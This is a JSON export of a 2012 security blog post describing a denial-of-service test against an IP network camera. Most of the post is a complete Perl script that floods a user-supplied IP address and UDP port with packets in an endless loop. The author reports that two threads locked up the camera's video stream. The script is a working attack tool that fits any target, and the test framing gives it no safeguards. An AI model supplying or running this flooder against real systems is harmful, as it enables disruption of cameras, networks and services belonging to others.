{"id":762,"date":"2012-07-05T23:23:25","date_gmt":"2012-07-05T22:23:25","guid":{"rendered":"http:\/\/www.phillips321.co.uk\/?p=762"},"modified":"2012-07-05T23:23:25","modified_gmt":"2012-07-05T22:23:25","slug":"dos-against-ip-camera-using-udp","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/07\/05\/dos-against-ip-camera-using-udp\/","title":{"rendered":"DoS against IP camera using UDP"},"content":{"rendered":"<p>So on a test I wanted to test the possibility of performing a DoS against an IP based network camera to see of the possibility of disrupting it&#8217;s video stream. Well the idea was to hammer the device with UDP packets.<\/p>\n<p>A quick look around and I found this code <a href=\"http:\/\/www.linuxscrew.com\/2008\/04\/10\/tiny-perl-script-for-udp-flooding\/\" target=\"_blank\">here.<\/a> I decided to take a copy of the code as the base for a quick perl script.<\/p>\n<p>A quick munge and this is what I ended with:<\/p>\n<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/><\/div><\/td><td><div class=\"perl codecolorer\"><span class=\"co1\">#!\/usr\/bin\/perl<\/span><br \/>\n<span class=\"kw2\">use<\/span> Socket<span class=\"sy0\">;<\/span><br \/>\n<span class=\"re0\">$ARGC<\/span><span class=\"sy0\">=@<\/span><span class=\"kw2\">ARGV<\/span><span class=\"sy0\">;<\/span><br \/>\n<span class=\"kw1\">if<\/span> <span class=\"br0\">&#40;<\/span><span class=\"re0\">$ARGC<\/span> <span class=\"sy0\">!=<\/span><span class=\"nu0\">2<\/span><span class=\"br0\">&#41;<\/span> <span class=\"br0\">&#123;<\/span><br \/>\n&nbsp;<a href=\"http:\/\/perldoc.perl.org\/functions\/printf.html\"><span class=\"kw3\">printf<\/span><\/a> <span class=\"st0\">&quot;doscam.pl by phillips321.co.uk<span class=\"es0\">\\n<\/span>&quot;<\/span><span class=\"sy0\">;<\/span><br \/>\n&nbsp;<a href=\"http:\/\/perldoc.perl.org\/functions\/printf.html\"><span class=\"kw3\">printf<\/span><\/a> <span class=\"st0\">&quot;$0 &lt;ip&gt; &lt;port&gt;<span class=\"es0\">\\n<\/span>&quot;<\/span><span class=\"sy0\">;<\/span><br \/>\n&nbsp;<a href=\"http:\/\/perldoc.perl.org\/functions\/exit.html\"><span class=\"kw3\">exit<\/span><\/a><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span><br \/>\n<span class=\"br0\">&#125;<\/span><br \/>\n<span class=\"kw1\">my<\/span> <span class=\"br0\">&#40;<\/span><span class=\"re0\">$ip<\/span><span class=\"sy0\">,<\/span><span class=\"re0\">$port<\/span><span class=\"sy0\">,<\/span><span class=\"re0\">$size<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span><br \/>\n<span class=\"re0\">$ip<\/span><span class=\"sy0\">=<\/span><span class=\"re0\">$ARGV<\/span><span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span><span class=\"br0\">&#93;<\/span><span class=\"sy0\">;<\/span><br \/>\n<span class=\"re0\">$port<\/span><span class=\"sy0\">=<\/span><span class=\"re0\">$ARGV<\/span><span class=\"br0\">&#91;<\/span><span class=\"nu0\">1<\/span><span class=\"br0\">&#93;<\/span><span class=\"sy0\">;<\/span> <br \/>\n<a href=\"http:\/\/perldoc.perl.org\/functions\/socket.html\"><span class=\"kw3\">socket<\/span><\/a><span class=\"br0\">&#40;<\/span>crazy<span class=\"sy0\">,<\/span> PF_INET<span class=\"sy0\">,<\/span> SOCK_DGRAM<span class=\"sy0\">,<\/span> <span class=\"nu0\">17<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span><br \/>\n<span class=\"re0\">$iaddr<\/span> <span class=\"sy0\">=<\/span> inet_aton<span class=\"br0\">&#40;<\/span><span class=\"st0\">&quot;$ip&quot;<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span><br \/>\n<a href=\"http:\/\/perldoc.perl.org\/functions\/printf.html\"><span class=\"kw3\">printf<\/span><\/a> <span class=\"st0\">&quot;Flooding UDP port &quot;<\/span> <span class=\"sy0\">.<\/span> <span class=\"re0\">$port<\/span> <span class=\"sy0\">.<\/span> <span class=\"st0\">&quot; on &quot;<\/span> <span class=\"sy0\">.<\/span> <span class=\"re0\">$ip<\/span> <span class=\"sy0\">.<\/span> <span class=\"st0\">&quot;<span class=\"es0\">\\n<\/span>&quot;<\/span><span class=\"sy0\">;<\/span><br \/>\n<a href=\"http:\/\/perldoc.perl.org\/functions\/printf.html\"><span class=\"kw3\">printf<\/span><\/a> <span class=\"st0\">&quot;end with Ctrl-C<span class=\"es0\">\\n<\/span>&quot;<\/span><span class=\"sy0\">;<\/span><br \/>\n<span class=\"kw1\">for<\/span> <span class=\"br0\">&#40;<\/span><span class=\"sy0\">;;<\/span><span class=\"br0\">&#41;<\/span> <span class=\"br0\">&#123;<\/span><br \/>\n&nbsp;<span class=\"re0\">$size<\/span><span class=\"sy0\">=<\/span><span class=\"re0\">$rand<\/span> x <span class=\"re0\">$rand<\/span> x <span class=\"re0\">$rand<\/span><span class=\"sy0\">;<\/span><br \/>\n&nbsp;<a href=\"http:\/\/perldoc.perl.org\/functions\/send.html\"><span class=\"kw3\">send<\/span><\/a><span class=\"br0\">&#40;<\/span>crazy<span class=\"sy0\">,<\/span> <span class=\"nu0\">0<\/span><span class=\"sy0\">,<\/span> <span class=\"re0\">$size<\/span><span class=\"sy0\">,<\/span> sockaddr_in<span class=\"br0\">&#40;<\/span><span class=\"re0\">$port<\/span><span class=\"sy0\">,<\/span> <span class=\"re0\">$iaddr<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span><br \/>\n<span class=\"br0\">&#125;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Running one thread of this managed to slow the rate at which the stream was been sent, a second thread caused the video stream to lockup entirely. Result!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So on a test I wanted to test the possibility of performing a DoS against an IP based network camera to see of the possibility of disrupting it&#8217;s video stream. Well the idea was to hammer the device with UDP packets. A quick look around and I found this code here. I decided to take [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,4],"tags":[297,298,295,296,250,278],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/762"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=762"}],"version-history":[{"count":4,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/762\/revisions"}],"predecessor-version":[{"id":767,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/762\/revisions\/767"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=762"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=762"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=762"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}